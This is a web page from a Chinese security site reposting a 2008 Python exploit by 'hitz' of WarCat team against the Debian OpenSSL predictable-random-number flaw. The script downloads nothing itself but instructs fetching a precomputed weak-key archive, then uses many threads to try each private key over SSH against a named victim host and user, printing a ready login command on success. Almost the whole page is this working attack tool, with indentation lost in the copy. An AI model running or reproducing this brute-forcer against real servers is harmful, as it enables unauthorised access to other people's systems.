首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)
来源:warcat.no-ip.org 作者:hitz 发布时间:2008-06-02  
#!/bin/python
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
############################################################################
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
#             http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#     - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#     - execute: python exploit.py (without parameters) to display the help
#     - if the key is found, the script shows something like that:
#         Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#   Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################


import Queue
import os
import string
import time
from threading import Thread
import sys

#This class only has a boolean, which will be True if some thread find the key
class End():
def __init__(self):
self.end = False

def Finish(self):
self.end = True

def GetEnd(self):
return self.end


#This is the thread class
class Connection(Thread):
def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'):
Thread.__init__(self)
self.QueueDir = QueueDir
self.TheEnd = TheEnd
self.dir = dir
self.host = host
self.user = user
self.port = port

def run(self):
while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
key = self.QueueDir.get()

cmd = 'ssh -l ' + self.user
cmd = cmd + ' -p ' + self.port
cmd = cmd + ' -o PasswordAuthentication=no'
cmd = cmd + ' -i ' + self.dir + '/' + key
cmd = cmd + ' ' + self.host + ' exit; echo $?'

pin,pout,perr = os.popen3(cmd, 'r')
pin.close()

#To debug descoment the next line. This will show the errors reported by ssh
#print perr.read()

if pout.read().lstrip().rstrip() == '0':
self.TheEnd.Finish()
print ''
print 'Key Found in file: '+ key
print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host)
print ''

print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

if len(sys.argv) < 4:
print './exploit.py <dir> <host> <user> [[port] [threads]]'
print '    <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print '    <host>: The victim host'
print '    <user>: The user of the victim host'
print '    [port]: The SSH port of the victim host (default 22)'
print '    [threads]: Number of threads (default 4) Too big numer is bad'

sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

if len(sys.argv) <= 4:
  port='22'
  threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4

else:
port=sys.argv[4]
threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()

for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,port).start()


while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
time.sleep(5)
actsize = QueueDir.qsize()
speed = (initsize - tested - actsize)/5
tested = initsize - actsize

print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component JooBB 0.5.9 B
·Joomla Component acctexp <= 0.
·SecurityGateway 1.0.1 (usernam
·MDaemon <= 9.6.5 Multiple Remo
·Joomla Component com_mycontent
·C6 Messenger ActiveX Remote Do
·Samba (client) receive_smb_raw
·Joomla Component JooBlog 0.1.1
·Joomla Component com_biblestud
·ipbProArcade 2.5.1 (user) Remo
·freeSSHd 1.2.1 Remote Stack Ov
·Joomla Component jotloader <=
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved